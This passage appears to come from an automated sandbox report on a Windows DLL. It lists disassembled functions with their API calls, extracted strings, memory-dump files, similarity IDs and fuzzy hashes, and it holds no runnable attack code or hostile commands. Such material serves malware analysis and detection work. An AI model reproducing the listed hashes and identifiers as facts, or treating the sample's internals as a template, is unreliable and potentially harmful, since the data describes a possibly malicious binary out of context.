                          • GetProcessHeap.KERNEL32 ref: 6E4B2B74
                          • HeapAlloc.KERNEL32(005B0000,00000000,0000000C), ref: 6E4B2B8B
                          • ReleaseSRWLockExclusive.KERNEL32(6E4FADB4), ref: 6E4B2BC8
                          Strings
                          • assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi, xrefs: 6E4B2BE8
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocExclusiveHeapLock$AcquireProcessRelease
                          • String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:jbmojtgfautxqskitilrxgprrsoryhnjiexhvlejqbbtabuvcjbeqafloiohojnkwxtneumtjxczayjyebuempczgbfbrdwkmdkgjqjcnunttbmcxecyvhxsfpitjjwfpzkycxdjnqi
                          • API String ID: 3228198226-2044759171
                          • Opcode ID: 846f4cac512fdd2b10262c9faedff488c58c44ebb24a4fbfaf2cfb2a2481f286
                          • Instruction ID: 1b57236c5b7320c1feea3ba8cb84591e673a0f8c312a974d30bcdc961e7500fe
                          • Opcode Fuzzy Hash: 846f4cac512fdd2b10262c9faedff488c58c44ebb24a4fbfaf2cfb2a2481f286
                          • Instruction Fuzzy Hash: A34135B59002098FDB00DFF4D858BAEBBB5FF88718F10452AD519AB380DB759949CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C1BFC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,6E4C1D09,FFFDD001,00000400,?,00000000,?,?,6E4C1E82,00000021,FlsSetValue,6E4F39F8,6E4F3A00,?), ref: 6E4C1CBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: a8e7cfa28b768a7e9dfab22d3dff97f080de312b417927075f686e148e8236bd
                          • Instruction ID: 548896d50bc058d161139d7ef5940b4615d3d510b9ab2819f5084f20da2567ac
                          • Opcode Fuzzy Hash: a8e7cfa28b768a7e9dfab22d3dff97f080de312b417927075f686e148e8236bd
                          • Instruction Fuzzy Hash: 04212B7A901525ABDB119AB5EC94F4A3778EB43FA4F110113F915A7384D730E909C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BCCFF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,6E4BCA41,6E4BA8E2,6E4BA0EC,?,6E4BA324,?,00000001,?,?,00000001,?,6E4F7DA8,0000000C,6E4BA41D), ref: 6E4BCD0D
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E4BCD1B
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E4BCD34
                          • SetLastError.KERNEL32(00000000,6E4BA324,?,00000001,?,?,00000001,?,6E4F7DA8,0000000C,6E4BA41D,?,00000001,?), ref: 6E4BCD86
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: a4fe2d643ea31d5e715b95a997c4a94ca511a71ec184ce823754269b2ecc0c80
                          • Instruction ID: efdf55ce105f0e81f39735695ef15ec613e327e059889fef387d055c4b442133
                          • Opcode Fuzzy Hash: a4fe2d643ea31d5e715b95a997c4a94ca511a71ec184ce823754269b2ecc0c80
                          • Instruction Fuzzy Hash: F5012836129E115EEA5426FE7CC8D872A5CEF83BB8720032FE528992D0FF31881155B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B97A0, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E4B9E50: GetTickCount64.KERNEL32 ref: 6E4B9E57
                          • GetTickCount64.KERNEL32 ref: 6E4B97D6
                          • GetTickCount64.KERNEL32 ref: 6E4B97F4
                          • GetTickCount64.KERNEL32 ref: 6E4B980D
                          • GetTickCount64.KERNEL32 ref: 6E4B980F
                          • GetTickCount64.KERNEL32 ref: 6E4B9816
                          • GetTickCount64.KERNEL32 ref: 6E4B9834
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Count64Tick
                          • String ID:
                          • API String ID: 1927824332-0
                          • Opcode ID: f41c7a8564e1dd0c34a4a20f5e284bd5cb03bc16849a4ab0270ef9a348e9abaa
                          • Instruction ID: 2e4fda0c1026e19a19d22420e02329f38251de77250fc1fd30c82348cb5a945f
                          • Opcode Fuzzy Hash: f41c7a8564e1dd0c34a4a20f5e284bd5cb03bc16849a4ab0270ef9a348e9abaa
                          • Instruction Fuzzy Hash: A1012D12C24A5899D603BA7AB841645BA6D6FE77D4B16C313A04B77002FFA114F396A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4A6D10, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6E4A6D24
                          • {invalid syntax}, xrefs: 6E4A6D54
                          • _!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6E4A6D7A, 6E4A6DB5
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __aulldiv__aullrem
                          • String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
                          • API String ID: 3839614884-2364648981
                          • Opcode ID: 67b343bd18ab190d03aa0175ed99b0ab5da52b7f956de967f0253dda682df5cc
                          • Instruction ID: dee1fd241e06f688e9198f12c8c074c6850c51aa916886d020357ec69a4b9924
                          • Opcode Fuzzy Hash: 67b343bd18ab190d03aa0175ed99b0ab5da52b7f956de967f0253dda682df5cc
                          • Instruction Fuzzy Hash: CF41AD757282104BD7248ABCD840F6AB6D5DFA47A4F00493FEA899F3D9E675C811C3A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AD1B0, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00000001,6E4AC906), ref: 6E4AD1BB
                          • TlsGetValue.KERNEL32(00000000,00000001,6E4AC906), ref: 6E4AD1D3
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4AD1F3
                          • TlsGetValue.KERNEL32(00000000), ref: 6E4AD213
                          • GetProcessHeap.KERNEL32 ref: 6E4AD226
                          • HeapAlloc.KERNEL32(005B0000,00000000,0000000C), ref: 6E4AD239
                          • TlsSetValue.KERNEL32(00000000,00000000,005B0000,00000000,0000000C), ref: 6E4AD266
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value$Heap$AllocProcess
                          • String ID:
                          • API String ID: 3559649508-0
                          • Opcode ID: 72b6c06bab867ffa5816bce8bfee9687fd6832bd63fc0d77015b7ab13ead2e41
                          • Instruction ID: 0faf63b7efc6935580d24fe6cec58e44401c5a52dfdf9e02507d33fd3247c919
                          • Opcode Fuzzy Hash: 72b6c06bab867ffa5816bce8bfee9687fd6832bd63fc0d77015b7ab13ead2e41
                          • Instruction Fuzzy Hash: C011C371600201DBEB506FF9A818F56329DAF55A69F020827DE01D7388DB35E800DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C0EB1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                          Download Yara Rule
                          Strings
                          • C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E4C0ECD
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID:
                          • String ID: C:\Windows\SYSTEM32\loaddll32.exe
                          • API String ID: 0-1872383224
                          • Opcode ID: fee0dd75781ff35e86e585caf85a2384c81804d3732b1ce24be267beea60a22a
                          • Instruction ID: 58873ac171be0e0c326df2612fbc5afdf7e0e8277fba1dc7187cfae9f103922c
                          • Opcode Fuzzy Hash: fee0dd75781ff35e86e585caf85a2384c81804d3732b1ce24be267beea60a22a
                          • Instruction Fuzzy Hash: 7521A7B9618215BF97409FF5CC40D9B777DEF49B68B10491BE818D7240F7B1E88187A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BDD62, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,?,6E4BDE23,00000000,?,00000001,00000000,?,6E4BDE9A,00000001,FlsFree,6E4F2F84,FlsFree,00000000), ref: 6E4BDDF2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-
                          • API String ID: 3664257935-2084034818
                          • Opcode ID: ab0d608179c3fced654d67795592a1f26f9e5a993d99f75398df75276fbe7f45
                          • Instruction ID: 02b42c2d34313b7acc24eaa9946d4edf2e4f92970256acbd0c096e4521f6d080
                          • Opcode Fuzzy Hash: ab0d608179c3fced654d67795592a1f26f9e5a993d99f75398df75276fbe7f45
                          • Instruction Fuzzy Hash: 5911E732A616259BDF125AF99C44F4A3768AF02B60F1101A2E851A7384DB70E9018AF5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BEC2D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A4F87F55,00000000,?,00000000,6E4C7473,000000FF,?,6E4BEBBD,?,?,6E4BEB91,?), ref: 6E4BEC62
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4BEC74
                          • FreeLibrary.KERNEL32(00000000,?,00000000,6E4C7473,000000FF,?,6E4BEBBD,?,?,6E4BEB91,?), ref: 6E4BEC96
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: e4b78ab14afdcbb03bffc7516c086e10244dfff1c87f60a8628450bacaae017d
                          • Instruction ID: c71a381e40bf09358d602b2f4ad65eef4e33e444bbb5d1ea34043afdefcab577
                          • Opcode Fuzzy Hash: e4b78ab14afdcbb03bffc7516c086e10244dfff1c87f60a8628450bacaae017d
                          • Instruction Fuzzy Hash: 3F016776904959EFDF019FB1DD48FAFBBB9FB49B10F010526E811A6390DB74A500CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC440, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6E4AC445
                          • GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6E4AC455
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: SetThreadDescription$kernel32
                          • API String ID: 1646373207-1950310818
                          • Opcode ID: 93455dad4fd418f11476668a25f824b1abd28911881a278ea37f57e4abc6d163
                          • Instruction ID: fe33827555893c98b3d72b00fa66d6e15c847f483a26ba813138356b075e0e2f
                          • Opcode Fuzzy Hash: 93455dad4fd418f11476668a25f824b1abd28911881a278ea37f57e4abc6d163
                          • Instruction Fuzzy Hash: 60B092B9604D4167AE90BFFB5D1CE273A59EAA9A627034446AA12DA600CA209000A961
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC420, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32), ref: 6E4AC425
                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6E4AC435
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: GetSystemTimePreciseAsFileTime$kernel32
                          • API String ID: 1646373207-392834919
                          • Opcode ID: 56433d134a8a1bd62ef16c50867d4c421d16644d65a7866136bc9751b6557a2c
                          • Instruction ID: f6e05170b4f87920d4d6d2e0f2d62ed03e75bf87ee363a68bb35f80fc5297b33
                          • Opcode Fuzzy Hash: 56433d134a8a1bd62ef16c50867d4c421d16644d65a7866136bc9751b6557a2c
                          • Instruction Fuzzy Hash: 7FB09275604D4266AE90BFFB5A0CE2B391AAAE5A627034446A512DAB05CA20A000A921
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC4C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6E4AC4C5
                          • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6E4AC4D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtCreateKeyedEvent$ntdll
                          • API String ID: 1646373207-1373576770
                          • Opcode ID: 0e5264b6b457a604d2c2ea33d730c4519d78b97ccefe1c7ee0e921dfb7a651d5
                          • Instruction ID: 52de050253735e85b1dcaa814322e9fc29d44ea23edbd33971d66220b826cc71
                          • Opcode Fuzzy Hash: 0e5264b6b457a604d2c2ea33d730c4519d78b97ccefe1c7ee0e921dfb7a651d5
                          • Instruction Fuzzy Hash: 47B09B75504541665D94BEF35D0CD163615568571670144456116D7940C6109400E925
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC480, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6E4AC485
                          • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6E4AC495
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtWaitForKeyedEvent$ntdll
                          • API String ID: 1646373207-2815205136
                          • Opcode ID: 670749a1110556f2b54bf36b7aa5fd1dc03831b241aba5c145fb0791183f31d5
                          • Instruction ID: 5239f587098cbb9c40a9054e03ae50cf530551060e6e0ec09a9e2cd01099a2e0
                          • Opcode Fuzzy Hash: 670749a1110556f2b54bf36b7aa5fd1dc03831b241aba5c145fb0791183f31d5
                          • Instruction Fuzzy Hash: 28B09279A08A41669E94FFF3690CE163A28AA85A26B024456A11ADA640CA20E000ED26
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC4A0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll), ref: 6E4AC4A5
                          • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6E4AC4B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: NtReleaseKeyedEvent$ntdll
                          • API String ID: 1646373207-31681898
                          • Opcode ID: d9e2bc664da6188f48357794100f9f0d0dd6cce28cb28a7f3e1e7e8b2805257d
                          • Instruction ID: 0e4756af5acbe6c153dac5bc7f5dda137521a90c499e2d7897935c63c4447466
                          • Opcode Fuzzy Hash: d9e2bc664da6188f48357794100f9f0d0dd6cce28cb28a7f3e1e7e8b2805257d
                          • Instruction Fuzzy Hash: B0B092B5A08941669E94BEF36D0CE163A28AA95A27B02444AA516DA640EA24A400E925
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C4089, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetConsoleOutputCP.KERNEL32(A4F87F55,?,00000000,?), ref: 6E4C40EC
                            • Part of subcall function 6E4C19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E4C3B22,?,00000000,-00000008), ref: 6E4C1A5F
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E4C4347
                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E4C438F
                          • GetLastError.KERNEL32 ref: 6E4C4432
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                          • String ID:
                          • API String ID: 2112829910-0
                          • Opcode ID: d0309045f5ea20ba1a4eb3f8a82a960be0b9682ac81f71c02682416e3a9b2d9e
                          • Instruction ID: aacc28a07e96393ef641faac9e16019ebfc68c5675c023d920ab612c3da50a78
                          • Opcode Fuzzy Hash: d0309045f5ea20ba1a4eb3f8a82a960be0b9682ac81f71c02682416e3a9b2d9e
                          • Instruction Fuzzy Hash: 78D17879E002589FCB01CFE8D980AEDBBB5FF49B44F18452AE855EB341D730A942CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4B2620, Relevance: 6.2, APIs: 4, Instructions: 215COMMON
                          Download Yara Rule
                          APIs
                          • WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6E4B27B1
                          • WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6E4B2803
                          • GetLastError.KERNEL32(?,?,?), ref: 6E4B280D
                          • GetLastError.KERNEL32(?,?,?), ref: 6E4B2875
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ConsoleErrorLastWrite
                          • String ID:
                          • API String ID: 4006445483-0
                          • Opcode ID: 429c8756214d315943e1831cf06a907e4f2c5fc667d3a019e793a2bdafc39ca6
                          • Instruction ID: bd2d762c8536fa2abfd256d1948bb97d71272b300d0a48206cc259b83c4930f5
                          • Opcode Fuzzy Hash: 429c8756214d315943e1831cf06a907e4f2c5fc667d3a019e793a2bdafc39ca6
                          • Instruction Fuzzy Hash: 38616931E187158BE7148EF5CC50F6A7796EFC5344F048A3BE89487384EE75D84286BA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4BCDDF, Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: a3d87156fa383a805537f78ee94d46b5bee074590eaced153a3fbed1689cb134
                          • Instruction ID: e0edc4298e2f4973003fbeaea456b421c63353908752db41bff29437b64590cb
                          • Opcode Fuzzy Hash: a3d87156fa383a805537f78ee94d46b5bee074590eaced153a3fbed1689cb134
                          • Instruction Fuzzy Hash: F151C972605606EFEB158FB5D8D0FAA73A8EF04704F11086FE9159E290E771E861CBB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4C06C7, Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 6E4C19B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6E4C3B22,?,00000000,-00000008), ref: 6E4C1A5F
                          • GetLastError.KERNEL32 ref: 6E4C072B
                          • __dosmaperr.LIBCMT ref: 6E4C0732
                          • GetLastError.KERNEL32(?,?,?,?), ref: 6E4C076C
                          • __dosmaperr.LIBCMT ref: 6E4C0773
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                          • String ID:
                          • API String ID: 1913693674-0
